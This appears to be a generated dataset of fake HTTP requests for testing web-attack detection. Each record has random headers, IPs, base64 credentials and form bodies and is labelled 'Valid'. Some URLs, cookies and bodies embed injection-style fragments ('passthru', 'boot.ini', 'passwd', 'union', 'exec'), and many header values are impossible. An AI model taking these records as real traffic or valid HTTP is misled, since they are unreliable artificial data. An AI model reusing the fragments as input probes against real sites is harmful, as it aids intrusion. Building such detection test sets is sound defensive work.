ETag: W/"HuHuIb_fESghn.N"
Expect: uohn=cmnystid
From: 0ke0@2ergsrmep.it
If-Modified-Since: Fri, 23 May 08 08:08:36 CET
If-Unmodified-Since: Sun, 21 Sep 08 04:16:49 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Oct 05 02:11:56 CET
Max-Forwards: 496
MIME-Version: 3.3
Pragma: z=wvu
Proxy-Authorization: Digest cnonce="g4OAase"
Authorization: Digest realm
Range: -984
Referer: /tswleI/53hudn7i.asmx
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 6.5; ye-am; rv:7.3.0) Gecko/61439486
UA-CPU: Sparc
UA-Disp: 504,612,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 449x1634
Via: HTTP/9.0 43.152.133.84, n26N/8.9 www.mo2ees.jpg, 9.1 146.154.180.152
Transfer-Encoding: deflate
Upgrade: Trcl/0.4, Iktrb/8.6, ydcebx/8.7, rfe/6.1
Warning: 990 www.kpmht.gif "roigoeiiehg" 
X-Forwarded-For: 43.133.9.20
X-Serial-Number: 426343709
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

f07entcSutiie=neith&idmaFhb=nlR&J_systemsexecnP=5ddeY brbtmpln~04&s3aoooamo6eod=wb6reshob&fe=eIC.HQ4qL5&7DwgetubI1hDc=0944&nxdD0qaao=zXKzCCMeWFfI&3niy8aTcB0rc=brcsSc&hip1ietzdven=frs&izovbtlu2=n3s%&ieeVc=aTctHJcUJ-3&cRi=8E&nodR7Doz=reno&iedjALyzaxsssmh=3Ke&To96esoql=92765

End - Id: 7590
Start - Id: 7075
class: Valid
PUT /isend6e-qF4C8wlJ5N/oiPosEOSQY3oBeUqnzb0/t.t@Vzd7l/nQ13lptTltb-J/fCnQnak.Rq/furRmAx7k_8yf/yFkK/hygdaeIn/5aNY.aspx? HTTP/1.1
Content-Length: 32
Content-Language: sz8sam7e,a
Content-Encoding: gzip
Content-Location: http://www.te7xotp.com/jeloi/aeaes.cfm
Content-MD5: c2lyaXBlMGE2eWxzU2RobA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Mar 09 12:39:00 UTC
Last-Modified: Sun, 28 Sep 08 22:35:50 UTC
Host: 60.209.124.118
Connection: qketh
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, identity, identity;q=0.8, deflate;q=0.0, identity;q=0.0
Accept-Language: urltiE-1lexi, i9ttlhct-udontweg;q=0.6
Cache-Control: Stsejtg='7t'
Client-ip: 133.103.82.179
Cookie: ath=e;rEvu6nhot4Ff0oi=lo0reieau;kBC@mQr5SJDlink=qD6YNa3btH;tpFaonhsegMyy=tuthItn5erinwdu;ylibGBQhuDR=7
Cookie2: $Version="672"
Date: Tue, 22 Jul 08 08:26:08 CET
ETag: W/"ZK7Y4he@iaf_mrz9c"
Expect: 100-continue
From: dsgletSd@lzsej.ch
If-Modified-Since: Fri, 23 Jan 04 12:03:16 GMT
If-Unmodified-Since: Sun, 23 Oct 05 10:57:19 UTC
If-Match: *
If-None-Match: *
If-Range: "p_oLq2x-OcXzu2kXsK"
Max-Forwards: 46
MIME-Version: 8.4
Pragma: ehrL='snr'
Proxy-Authorization: NTLM WmExdG5ldGF0ZG50c2lsOWF5Y2lpc2VyYndmZXRoNDFvYg==
Authorization: Digest username="eudhd"
Range: 69519-,580-44
Referer: http://www.lcTp.net/oemmo/robeihsv.wav
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/4.4 (Windows; U; Win98 1.2; oc-tr; rv:0.8.2) Gecko/19873133
UA-CPU: x86
UA-Disp: 4109,8794,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6819x838
Via: 4.2 www.lKiltt.htm, 5.0 201.54.68.227
Transfer-Encoding: 8none; erslD7=hxe8yso
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 300 www.4aei.js "Ajhoehebly" "Tue, 03 Nov 09 18:37:06 CET"
X-Forwarded-For: 6.110.131.156
X-Serial-Number: 317162195276859
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sv2te7=cbetween&05zpanni=8815120

End - Id: 7075
Start - Id: 3437
class: Valid
GET /mxeosh5hmrrtDdechNdO/aG9WcjFkEHNSc/a.1nHfjMFxkmQn9Z/rhnefosnceo/pthhb3aee/zoCw1nMng.-B-1_5r/r6ahav/gpZ3W5/Etsm/dXrGbF/1shn/jrY00P4IKMqmxjr1MFq.msf?aadBnm=833&xoqmwttt=npai0YgEa+hsmh%29w%29log%25t&oHEbtlnxu=159&r5araehe=8699469908&cl=71889&i6056drxot=4210776&eeb8one8=l%25a%3Dtperl HTTP/1.0
Host: 106.123.84.153
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, deflate;q=0.0, compress;q=0.0, gzip, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 53.252.183.250
Cookie: ctarAoxu=7056589;Iilloh=55608
Cookie2: $Version="644"
Date: Fri, 27 Nov 09 04:44:46 GMT
ETag: W/"-ux1L@tJgN0cXsjizl_"
Expect: sstme=eTehehs;lsJr=etacnI
From: otEj@3satd.de
If-Modified-Since: Sun, 30 Jan 05 18:34:51 GMT
If-Unmodified-Since: Mon, 16 Nov 09 06:31:15 GMT
If-Match: "kZuihvuHKHNAOwJ35"
If-None-Match: "_mXv5hr9Scwhw.3-f"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: oelm rVeossvy=Pglhhhii
Authorization: NTLM RWF0ZXllb3RiQ2lxcmVlaG1oMGFwYWU4T2hyeHR0aGV6YWVhYXZT
Range: 2990-211005
Referer: /jR5fti.wav
TE: gzip,deflate,gzip
Trailer: Date
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 4.7; ih-rq; rv:1.9.0) Gecko/62464916
UA-CPU: MIPS
UA-Disp: 426,091,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 969x7653
Via: 2.1 www.apAt.png, FTP/6.5 www.aiOusri4.shtml, 5.0 www.i7she.shtml
Transfer-Encoding: identity
Upgrade: he2aGa/7.2, t4cmu/0.8
Warning: 985 www.elsrdUt.shtml "irhbaiTogi7reAzgTe5" "Tue, 31 May 05 01:52:52 UTC"
X-Forwarded-For: 60.74.245.251
X-Serial-Number: 80963840971
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3437
Start - Id: 25639
class: Valid
GET /actWYrN2BB/W-dXvN-_/Raettcem1o7ead/lpPhQ/iRetyHpkuuqap7neri.jpg?qsuPobNYlgf=uatarfW&Rnbzedheteox=a%3BNr&es2dlri=a%25rwolocationdocSt HTTP/1.1
Host: 230.242.49.255
Connection: keep-alive
Accept: text/*;q=0.7, image/gif;q=0.8, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 86.20.85.20
Cookie: tfggmgwjptdp=6113053784;yEtdrterz=;e2~xo
Cookie2: $Version="0"
Date: Mon, 12 Dec 05 20:27:26 CET
ETag: "O3lD_Tx2.2lxIDQY"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sun, 03 Jun 07 02:27:25 CET
If-Unmodified-Since: Wed, 25 Feb 04 05:23:41 GMT
If-Match: "BU.R7bQW_r_fNPTXRKa"
If-None-Match: *
If-Range: Tue, 19 May 09 13:07:38 GMT
Max-Forwards: 2
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: settb cnaa=ndr4
Range: 999492-
Referer: http://www.ttul1s.ch/nolLjipe/mTieyie/crltaiBw/hoigeetz.rar
TE: trailers,deflate,deflate;q=0.6
Trailer: Cache-Control
User-Agent: Mozilla/1.8 (Windows; U; Windows NT 6.1; ng-oP; rv:7.8.9) Gecko/47792709
UA-CPU: 68000
UA-Disp: 841,3299,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 143x5340
Via: 9.3 www.Ijzs.png, nTe/9.6 56.240.167.100
Transfer-Encoding: deflate
Upgrade: t4l/3.7, neThay/6.0, otri/7.6, oraT/8.6, imnM/8.2
Warning: 386 98.228.32.141 "dehnl" 
X-Forwarded-For: 103.157.38.55
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 25639
Start - Id: 34078
class: Valid
POST /doiecvm/trmxrlLnDl@PhNqVh/6z/dtaemaaaioyalsTrAlhI/ansmoensjtzbco2kmto/oaTQ@fRwBe9xKp6JWrN/IS1F_pbM81/hz3FeDhtacces6uUsock_stream0V/nDecfyiemesaaawthsee/access_logi52c/dtesC/ByDB.html? HTTP/1.0
Content-Length: 207
Content-Language: koSienjb,elec
Content-Encoding: deflate
Content-Location: http://raumoau.de/taqaea/cty9.js
Content-MD5: cnVycm1yczVpdXNsZXJzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Mar 06 20:47:17 GMT
Last-Modified: Thu, 01 Dec 05 08:44:04 UTC
Host: 178.122.7.167
Connection: keep-alive
Accept: application/zip
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: r1Nie-Eij;q=0.7, npansiel-bw;q=0.5, yt1yS9-o;q=0.0, mtannyo-yeb;q=0.5
Cache-Control: no-transform
Client-ip: 25.85.219.230
Cookie: ehe=hta h+\;EwtGmYy=1;boot.iniqxF=7U.z.Ma_Hs
Cookie2: $Version="88"
Date: Mon, 30 Jun 08 10:34:28 GMT
ETag: "BFICHBmFbZh3dSSHxy"
Expect: wrBsh=oemee7S
From: 2s3rpd@N8dboRb.biz
If-Modified-Since: Sat, 09 Jul 05 04:38:03 GMT
If-Unmodified-Since: Tue, 16 Oct 07 14:01:48 CET
If-Match: "XOLXyt5ELo.Wx2K5"
If-None-Match: "FX4BMfebF@SEmr@Z5Iyk"
If-Range: *
Max-Forwards: 761
MIME-Version: 9.8
Pragma: yb='ite2il'
Proxy-Authorization: noe8lh ucee=Ansbi
Authorization: Basic b0ROZ3FhbTpka3RvWWU1
Range: -241,685167-
Referer: http://6tn6nto.it/xhyn/3e4lbea/wtstd/ewrOpod/kiii.mpg
TE: gzip;q=0.1,gzip;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.0 (Windows; U; Win98 1.4; Tr-zD; rv:8.4.8) Gecko/88968999
UA-CPU: x86
UA-Disp: 2533,0787,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7731x678
Via: 7.0 www.Med2eto.jpeg, lfnte/5.7 www.Wsj7cemk.html, 4.1 www.temok.gif
Transfer-Encoding: gzip
Upgrade: zene/1.3, ui2/2.6, 6sbtj/0.2
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 37.174.184.200
X-Serial-Number: 155066
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

eesetokcro1= txid&ckeu0tEee=35227&sq=9el1Auzreid&deosteab6tsM=59554&uselno6b2hi=l'8gf\:sock_streaminv@t~m&nlatgzmE=uDtiNMgNHB&hitYtoiUhogpnf=thtae&lPhAFBBQ4XS=w8-re'oazq S&jewrH9aThEwhi=152887852

End - Id: 34078
Start - Id: 7456
class: Valid
PUT /rshiuysoum9leId/lnehnsao6atdse/ericetnzhnteda1lio2/476cqUinPHIc/aTJI.s1zT3/PW/tsekeiucHds4te/thallyexechMtmpexecF/lMha/e9euta4eA.gif? HTTP/1.0
Content-Length: 302
Content-Language: za,mimrc,ung4a
Content-Encoding: compress
Content-Location: /xns2htgo/Ohed.gz
Content-MD5: dXJ1dW90cnNyemlkbG5oZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Jul 04 23:00:29 CET
Last-Modified: Sat, 08 Dec 07 17:48:00 UTC
Host: www.7eehermi.de
Connection: keep-alive
Accept: image/gif, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: S5-vtc
Cache-Control: only-if-cached
Client-ip: 102.96.206.19
Cookie: txdt1akedlenamy=4396977;6eoMfdicsnnFmut=%metat;st2vbnu=fJXvk64;3owwyitcqsuNt=dl;ednailssde=64003834
Cookie2: $Version="398"
Date: Sat, 08 Aug 09 14:24:48 CET
ETag: W/"z3Y7L8L.q0H8jYFpAju"
Expect: 100-continue
From: haIOel@eOte.be
If-Modified-Since: Fri, 30 Apr 10 03:06:41 CET
If-Unmodified-Since: Sat, 17 Dec 05 15:15:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8331
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic bHN2ZGE2YTpzZVllYWdu
Authorization: Basic ZHJudzpub3dhNA==
Range: 95-162886,848657-426532
Referer: http://atot.cz/qV1tgoxm/he0g/oatoy/nbisncc/n4oil.aspx
TE: gzip
Trailer: Cache-Control
User-Agent: cpg7O_ http://www.2tnhs.com
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7331x9166
Via: 6.3 www.atdidest.js
Transfer-Encoding: deflate
Upgrade: aelor4/7.1
Warning: 422 www.rinltnh.jpeg "aiAkn" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 0702896
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

etssnt=ieoUborr6passwdeiyimgrgtu0&oyupotehlIlhn=4erde'irh&s5ciotdg3xrt=9956919&5yneh=ygpyO8V&aaltpiyhg4lota=tsp&qfeofi=Stnt|susr+lk=eet@b+&oissl=4331552&doyheoew4msi=622057&tetEt1coesg6iC=hercruu&position41s&hnenrdiao=s1eeshG&attoe4o=ua@Ra&PK@dopenG83m=mgp2DG5&Eom=tOse&3gem=cUjLf@2mp

End - Id: 7456
Start - Id: 28289
class: Valid
GET /dekntdsctea/sPpPn6w2-s6-wCBvOrIs/ltAiUsLsA2S/fefsmo/aK47d.shtml?aoSdahwde=ot HTTP/1.1
Host: 56.218.118.220
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: koi8;q=0.2, iso-8859-2;q=0.0, windows-1254, iso-8859-1
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 79.12.235.104
Cookie: 5tGIseaeiIn=06;_zeRtV7.Dp58=6nes(vetfwtt
Cookie2: $Version="911"
Date: Sat, 15 Nov 08 22:51:03 UTC
ETag: W/"8Fd9EHTVSWp@LX6ZdoN"
Expect: tst4d4=sorE4;haoicm
From: cBaMr@modtsl4l1o.biz
If-Modified-Since: Mon, 02 Jun 08 11:21:52 CET
If-Unmodified-Since: Fri, 20 Nov 09 12:31:38 UTC
If-Match: "8EyQ5vtjrwbp8-b"
If-None-Match: *
If-Range: Wed, 23 Jan 08 04:19:53 UTC
Max-Forwards: 1
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: olaif WunoaCa=aerw
Authorization: Digest uri=/hhxnpi/vheans.mspx
Range: 929-162
Referer: http://nyst6t.ch/mqewca.asp
TE: trailers,trailers,gzip;q=0.9
Trailer: Accept-Charset
User-Agent: Ssrnsnsjw
UA-CPU: x86
UA-Disp: 359,4370,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7134x450
Via: 0.3 73.193.123.158
Transfer-Encoding: nsoeti; Nsdatl=e98a
Upgrade: iaRtso/6.7, aakyo/7.1, oash/9.5, mwdp/3.3
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 48.186.166.27
X-Serial-Number: 3984354
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28289
Start - Id: 31636
class: Valid
GET /pEsS5rfre/tBmErotk1di/@catzZWQmocha/r8TV8jFDxBF32sQbo/e7Q87c/uo4bS9GdC7PooC.Os6KW/ozxwLB4eIw6/n1rk3/I4U1ZE525.php?r4Wcoi=aOm+sedLm+&adtieierKi=n0w&Pzlogtsam@5E=passthrut9Yoo%2B%29ngec+e&LcBe1nrdtr86bnd=1enqoemeacextd&bei7eao=rtacacexonppTadgqt&diei3=40399&trtcni=tiei%7Ce6O+reje&nrri0pTD=40640&a0ies1tegs=vsne&htIotn4hDEejb=nDWa&CyRjGpUwinnt=%40tiafsoe&oiipexakacci=systemsefi&geisacUhNow=lrgimg0jkpd%27ttS9x&et=iideaint HTTP/1.0
Host: 168.27.105.111
Connection: aaotliH
Accept: image/*;q=0.1, text/*;q=0.7, video/mpeg
Accept-Charset: euc-tw, windows-1252;q=0.2, hz-gb-2312, windows-1251;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 51.126.92.214
Cookie: tshitkathtedhhf=m+EsjUM;s]Xiopen 
Cookie2: $Version="7"
Date: Wed, 10 Sep 08 16:54:45 UTC
ETag: W/"ywRJ44ZaNecFGg2Jqedc"
Expect: leqhp5qI
From: 5njLtrtq@8sti3c.net
If-Modified-Since: Sat, 20 Aug 05 06:44:25 CET
If-Unmodified-Since: Sat, 10 Sep 05 16:53:37 GMT
If-Match: *
If-None-Match: "zW..4gAX4BfGbWc@"
If-Range: "S6xYQXRuZuiLDwjYiMC"
Max-Forwards: 171
MIME-Version: 6.7
Pragma: n3escu=oLts
Proxy-Authorization: ab9E dm2ejE=mryc
Authorization: Digest nc=AbB1B2b7
Range: 2998-103,-3,3141-
Referer: http://Cgi6tu9e.de/Sbcchin/hLezuiDg/7Htc0s/wclt/yesl.jpeg
TE: deflate
Trailer: Warning
User-Agent: Mozilla/8.2 (compatible; yq1Re; Win98; eaoiIada7; at2emrronj)
UA-CPU: 68000
UA-Disp: 0279,131,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8191x528
Via: tKNt/1.1 www.rrtiiii.jpeg
Transfer-Encoding: deflate
Upgrade: o45mrn/3.4, Xue/3.4, Eoh/8.3, ote/8.9, 9Uiay/0.3
Warning: 847 245.165.104.253:38182 "wolt9DaseP" 
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 31636
Start - Id: 24974
class: Valid
GET /mnsKtjOUMdu@/t0byVCOX7Nbwa/jirrotetnrgsjor/spmnunlstO/rxao4/i.P/e1eoka2yeeEam24/t2sazlkt/dcztpeLrshA/x5Mform3Su.JkRlocationxK.jpg?tju9r=r0o&ottitlnS6ehwr=0lib9copyr%3B HTTP/1.1
Host: 129.10.39.61
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: r-7ea5rk;q=0.9, nsm-h50;q=0.3, imo1-avs;q=0.0, sei-ye;q=0.5, n8s-eoffr;q=0.0
Cache-Control: max-age=86
Client-ip: 206.246.10.217
Cookie: 4j9UD.E=600001922;tetoi=norkSseohwpj9am;eSedthDeeswse=na1e;ecr9SSodOtrc=wgeti$1ldipnetcate'me/tuad;seohebk=eF3.@5yOX1MU
Cookie2: $Version="930"
Date: Mon, 21 Sep 09 05:31:40 UTC
ETag: "GZTm5CKqs4b82lR"
Expect: ciei8=ooG8ng
From: oxlprS@AxsMFbs.com
If-Modified-Since: Fri, 25 Jul 08 15:38:18 GMT
If-Unmodified-Since: Sun, 11 Apr 10 24:34:46 UTC
If-Match: *
If-None-Match: "D7X1Y6pAGCAmYbN"
If-Range: Tue, 22 Sep 09 17:08:23 GMT
Max-Forwards: 8899
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: n39Msi agpv8i=to9rstt
Authorization: bEar b2nNc=eooLiebl
Range: 160-51,-7141,157-4
Referer: /epam/ogeiNehd/rnfL.pl
TE: gzip;q=0.6
Trailer: If-Range
User-Agent: Tueie (9iVTMIlAk)
UA-CPU: StrongARM
UA-Disp: 7913,957,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x8766
Via: 4.2 157.135.140.40, HTTP/9.2 www.7hepgv.jpeg:7411
Transfer-Encoding: compress
Upgrade: hae/6.6, tnaNlo/3.6, ro4r/5.9
Warning: 586 www.xoesS.jpg "tereeuOoER" "Sun, 31 Oct 04 12:03:58 GMT"
X-Forwarded-For: 212.148.33.104
X-Serial-Number: 95297719813252220889
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24974
Start - Id: 18695
class: Valid
GET /nqO./eO1@Mddbgsound/sN2V1/haa5mvfoioabaNwpaxec/ZOd1Eu/qGJ4xWmZ0/eVcitluoitfocoaaEtr/6wzoK@qFo6/jrnecesohulaqEsqusd6/ueiiwtl2rMolregx/tyaaohd/bu7Tk.php4? HTTP/1.1
Host: www.tLbeoooa.gov
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, compress;q=0.1
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 135.243.15.143
Cookie: ei=h2rh;hmg=sesy;ou3=4aso;0orGshne=teeN
Cookie2: $Version="5"
Date: Tue, 03 Jul 07 13:14:37 CET
ETag: "Qq1wpLUjZ4zji6rUl6O"
Expect: ohrnAtc
From: nwa4tf@flsrn.org
If-Modified-Since: Wed, 12 Apr 06 13:48:28 GMT
If-Unmodified-Since: Sat, 09 Dec 06 07:44:05 UTC
If-Match: *
If-None-Match: *
If-Range: "Voym8wq_pyCrDH_lmgv"
Max-Forwards: 947
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic dDFzcjphcGxtb2V0ZQ==
Authorization: NTLM RWlkZHJydFZyZGVnYXJkdWM3M3RjZXdDZXJuOXJ0ZUZzZW51
Range: -0
Referer: /medI/cnHeteo/oEtiu/aaxco.mpg
TE: gzip;q=0.8,gzip;q=0.5
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 1.1; na-ie; rv:0.1.0) Gecko/85542340
UA-CPU: x86
UA-Disp: 4502,276,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8595x9488
Via: 5.3 156.123.193.241, 1.8 90.16.74.217, 0.6 61.54.92.224
Transfer-Encoding: deflate
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 538 220.84.138.187 "risamfaWl6rs" "Tue, 09 Mar 04 19:12:07 UTC"
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 343586
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18695
Start - Id: 7125
class: Valid
POST /rq15o0DK@o1X3RUgT0w.swf? HTTP/1.0
Content-Length: 84
Content-Language: dIcS9nce,qAsao
Content-Encoding: deflate
Content-Location: http://www.aiato.st/etFyzith/eezire/adNislb/ea1c4.fgf
Content-MD5: aWZsMEFuZmVsaWJ4dHUzZg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 06 Oct 05 09:29:28 GMT
Last-Modified: Wed, 14 Nov 07 10:21:30 CET
Host: www.maisdt.org
Connection: close
Accept: */*;q=0.0
Accept-Charset: us-ascii
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 172.196.89.146
Cookie: 4b=ssbgsoundo;9u3bxrmNitet=6700;ttottarst=replacet;wmimePftpU9l=eoj;o1em1paepttfopt=resvexeci;emlrsKNadcj=4 sae
Cookie2: $Version="13"
Date: Mon, 19 Oct 09 20:56:55 UTC
ETag: "YWfEAKRtn_k6G1Cuo8dc"
Expect: swrdoohr
From: kntoo@5rda2fql.com
If-Modified-Since: Sat, 18 Aug 07 01:23:39 CET
If-Unmodified-Since: Thu, 23 Feb 06 21:30:54 GMT
If-Match: "_.v601oxu@uvzf57-Hf"
If-None-Match: "xgvVJ8aMEtLN7JC@FB.s"
If-Range: "EaKoFiWQ@_aPCvkBMqOT"
Max-Forwards: 5873
MIME-Version: 0.7
Pragma: uciisin='scmwi3OA'
Proxy-Authorization: Basic eWllZ29hOnFva3AwMnJl
Authorization: Digest username="ene9hafo"
Range: 7984-736,48539-
Referer: /sdttnro/uetpenss/koitz/ee7kxn.nsf
TE: trailers,deflate;q=0.9,deflate;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.8 (Machintosh; U; Mac OS X 7.6; we-a4; rv:5.7.9) Gecko/50073934
UA-CPU: x86
UA-Disp: 9784,4196,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8126x925
Via: 3.1 185.226.106.185, 2.3 129.13.215.78:6014, HTTP/8.4 164.226.39.173
Transfer-Encoding: enoa
Upgrade: ttc3d/1.2, jllptm/3.7
Warning: 288 www.thnieil.tiff "ono32ramres" "Tue, 12 Jan 10 22:01:15 CET"
X-Forwarded-For: 212.135.218.165
X-Serial-Number: 84276248829844359
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tetm=l1l&svi=66&xmlZfK6vXBU.=iasA&xmaon1lohr=smboot.iniIpww&zv18dl=usr)ascriptexec

End - Id: 7125
Start - Id: 9683
class: Valid
GET /vLZoCKqHvv8lJ9LuAmQ/@2UyT.png?3fa0ts=calla&y45X.iy=t%27ovhunionnsb%3D%29f4++%5B&ucna4tGsnyN=e0U5&bdgedsr=6cayPahoamailb&u36c6ctl=ewR_%40.RTbiY&Ahwer=101&.DWHgYsock_streamnczv=420044 HTTP/1.1
Host: www.Reso2a.cz
Connection: xqor
Accept: video/mpeg;q=0.9, text/html
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=0179
Client-ip: 6.215.182.6
Cookie: bkl0totVoz=udbhiMSemrtesdIc
Cookie2: $Version="770"
Date: Fri, 16 Sep 05 18:13:29 GMT
ETag: W/"0fKvY5bTDF@W2VXy8Rn"
Expect: 100-continue
From: iRorfGR@ESiu.st
If-Modified-Since: Wed, 24 Nov 04 09:38:38 GMT
If-Unmodified-Since: Mon, 05 Feb 07 07:19:56 CET
If-Match: *
If-None-Match: *
If-Range: "y27-4lzG.xwio.Gsx"
Max-Forwards: 82
MIME-Version: 6.8
Pragma: rLy=f7IoeO9r
Proxy-Authorization: Basic ZXRyYWhybzQ6cGc0MGVmZQ==
Authorization: Digest realm
Range: 7-
Referer: http://www.eeEBcZsr.fr/SopR.cgi
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/1.6 (compatible; MSIE 2.6; Linux i386; i8Nt)
UA-CPU: x86
UA-Disp: 229,8929,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 669x055
Via: FTP/0.4 247.19.110.9, 1.7 32.224.227.213
Transfer-Encoding: ec8iT; hrgfs=insi
Upgrade: era/6.9
Warning: 376 www.wu1w.htm:846 "serteri" "Tue, 11 Dec 07 19:12:50 GMT"
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 66630290652
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9683
Start - Id: 34056
class: Valid
POST /eEi1slN9/ft/0benuo5ors/leSiaactdeaangbahzu/nMrck2qIBSh./qstylenc8/g5e9ehe/yWakNLHuumx/tHMf1DvJhO5eR9wGOb3/gqOFNG8k@AvT/srn7thegAwTedz3/56m.nsf? HTTP/1.0
Content-Length: 184
Content-Language: oasa
Content-Encoding: identity
Content-Location: /sbaue/Sjoo.png
Content-MD5: d2ttMDhuenNrZ2V1ZW5yZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Sep 07 13:19:10 GMT
Last-Modified: Fri, 29 Dec 06 14:31:15 GMT
Host: 3.125.111.229
Connection: ta91ec
Accept: */*;q=0.0
Accept-Charset: iso-8859-3;q=0.9, koi8-r;q=0.2, us-ascii
Accept-Encoding: compress;q=0.8, compress;q=0.6, identity
Accept-Language: *
Cache-Control: max-stale=11442
Client-ip: 183.39.50.79
Cookie: eea=zsBn$f9lsii;oyOkPcmss3aN=;fD unh;MXxthG0KH=cmd9c (eoteh9passthru~\Iaall6ls<;AtTseswic6mma=175601693
Cookie2: $Version="527"
Date: Thu, 18 Mar 04 22:09:55 GMT
ETag: "S9OJCWsXznZpHrXG"
Expect: tn8o
From: a66ero@negstqete.net
If-Modified-Since: Fri, 26 Nov 04 13:44:51 CET
If-Unmodified-Since: Thu, 30 Dec 04 03:57:59 GMT
If-Match: "P3P9hLXdr18TZhDc"
If-None-Match: *
If-Range: "XyIijDp4wLJyr-3g"
Max-Forwards: 0
MIME-Version: 8.9
Pragma: Seah=hnxa
Proxy-Authorization: Digest qop=auth
Authorization: ecps sNate=hinE8Ri
Range: 821815-50,1-
Referer: http://metseiJ.st/itf3O/njeiuhsp.aspx
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: awnT3hqRo7 http://www.ue5thhjc.st
UA-CPU: 68000
UA-Disp: 2533,0787,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 682x2942
Via: 5.0 223.250.149.33, 0gvE/9.8 114.193.77.116
Transfer-Encoding: compress
Upgrade: qhe6/5.5, Ndaod/1.6, zcbn/9.5, tweeah/0.8, v9imgh/0.4
Warning: 839 136.145.234.240:03 "8eru4Saovlliuyd" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 096002850
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gmw7tla=elus&al8req=Yp&iCc-cochildNO=2530584&d.0GetcF_lH=htiera;rraAydi&sejsLLoto=o7|feginsertnsr&soaAnihnUssm=sg9a7hk5W&Ckatwynxc=un6IgZDAdPp&R3wa2u=%u&sxempIolb9p5=232&r0lD0e=u

End - Id: 34056
Start - Id: 26596
